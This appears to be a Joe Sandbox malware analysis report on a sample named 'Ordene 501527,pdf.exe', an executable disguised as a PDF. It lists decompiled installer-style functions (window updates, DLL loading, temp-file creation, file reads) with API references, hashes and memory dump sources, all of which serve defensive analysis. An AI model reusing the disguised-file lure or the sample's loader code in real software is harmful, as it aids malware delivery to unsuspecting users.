Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
Opcode Fuzzy Hash: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004052C3(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a04;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8af4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406281(_t38, 0, 0x7a0f00, 0x7a0f00, _a4);
					}
					_t27 = lstrlenW(0x7a0f00);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a79e8, 0x7a0f00); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f00;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f00[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f00, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052c9
0x004052d3
0x004052d8
0x004052de
0x004052e9
0x004052ec
0x004052ef
0x004052f5
0x004052f5
0x004052fb
0x00405303
0x00405306
0x00405323
0x00405327
0x00405330
0x00405330
0x0040533a
0x00405343
0x0040534f
0x00405356
0x0040535a
0x0040535d
0x00405370
0x0040537e
0x0040537e
0x00405382
0x00405384
0x00405387
0x00000000
0x00405387
0x00405308
0x00405310
0x00405318
0x0040531e
0x00000000
0x0040531e
0x00405318
0x00405306
0x00405393

APIs

lstrlenW.KERNEL32(007A0F00,00000000,007924D8,751723A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,751723A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
Opcode Fuzzy Hash: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065C9(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004065e0
0x004065e9
0x004065eb
0x004065eb
0x004065ef
0x00406602
0x004065fc
0x004065fc
0x004065fc
0x0040661b
0x0040662f
0x00406636

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
wsprintfW.USER32 ref: 0040661B
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F

Strings

\, xrefs: 004065F1
%s%S.dll, xrefs: 00406615
UXTHEME, xrefs: 004065D2

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x78f6d8;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403308( *0x7a8a98 + _t62);
				}
				if(E004032F2( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004032F2(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004032F2(0x78b6d8, _t97) == 0) {
								goto L41;
							}
							if(E00405E03(_a8, 0x78b6d8, _t97) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce38 =  *0x40ce38 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce20 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004032F2(0x78b6d8, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce10 = 0x78b6d8;
						 *0x40ce14 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce18 = _t94;
							 *0x40ce1c = _v12;
							_t74 = E0040679A(0x40ce10);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce18; // 0x7924d8
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E004052C3(0,  &_v152); // executed
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce18; // 0x7924d8
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405E03(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403105
0x00403109
0x0040310c
0x00403111
0x00403113
0x00403113
0x0040311a
0x0040311e
0x00403123
0x00403125
0x00403125
0x0040312c
0x00403131
0x0040313c
0x0040313c
0x0040314e
0x004032e0
0x004032e0
0x00000000
0x00403154
0x00403158
0x0040328d
0x004032d0
0x004032d2
0x004032d2
0x004032de
0x004032e5
0x004032e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004032de
0x00403292
0x00000000
0x00000000
0x00403294
0x00403297
0x0040329a
0x0040329d
0x0040329f
0x0040329f
0x004032af
0x00000000
0x00000000
0x004032bd
0x00403287
0x00403287
0x004032e2
0x004032e2
0x00000000
0x004032e2
0x004032bf
0x004032c2
0x004032c9
0x00000000
0x00000000
0x00000000
0x004032cb
0x00000000
0x00403297
0x00403164
0x00403166
0x0040316d
0x0040316d
0x00403174
0x0040317a
0x00403181
0x00403184
0x00000000
0x00000000
0x00000000
0x00000000
0x0040318a
0x0040318a
0x0040318a
0x00403192
0x00403194
0x00403194
0x004031a5
0x00000000
0x00000000
0x004031ab
0x004031ae
0x004031b4
0x004031ba
0x004031ba
0x004031c5
0x004031cb
0x004031d0
0x004031d7
0x004031da
0x00000000
0x00000000
0x004031e0
0x004031e6
0x004031e8
0x004031f1
0x004031f3
0x00403224
0x0040322a
0x00403236
0x0040323b
0x0040323b
0x00403240
0x0040327b
0x00000000
0x00000000
0x00000000
0x00403242
0x00403246
0x0040325d
0x00403262
0x00403265
0x00403268
0x0040326b
0x0040326f
0x00000000
0x00000000
0x00000000
0x00403275
0x0040324f
0x00403256
0x00000000
0x00000000
0x00403258
0x00000000
0x00403258
0x00403240
0x00403283
0x00000000
0x00403283
0x00000000
0x0040318a

APIs

GetTickCount.KERNEL32 ref: 00403164
GetTickCount.KERNEL32 ref: 004031E8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403211
wsprintfW.USER32 ref: 00403224

Strings

... %d%%, xrefs: 0040321E

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D80(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405d86
0x00405d8c
0x00405d8d
0x00405d8d
0x00405d92
0x00405d93
0x00405d96
0x00405d9b
0x00405d9e
0x00405da8
0x00405db5
0x00405db9
0x00405dc1
0x00000000
0x00000000
0x00405dc5
0x00000000
0x00405dc7
0x00405dc7
0x00405dc7
0x00405dca
0x00405dcd
0x00405dcd
0x00405dd0
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405D9E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75173420,0040359C), ref: 00405DB9

Strings

nsa, xrefs: 00405D8D
"C:\Users\user\Desktop\Ordene 501527,pdf.exe" , xrefs: 00405D80
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1773469982
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x7a7a0c =  *0x7a7a0c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a0c, 0x7530,  *0x7a79f4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00406639 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406639(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065C9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406641
0x00406644
0x0040664b
0x00406653
0x0040665f
0x00000000
0x00406666
0x00406656
0x0040665d
0x00000000
0x0040666e
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
GetProcAddress.KERNEL32(00000000,?), ref: 00406666

Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
Part of subcall function 004065C9: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D51 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00405D51(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d55
0x00405d62
0x00405d77
0x00405d7d

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Ordene 501527,pdf.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

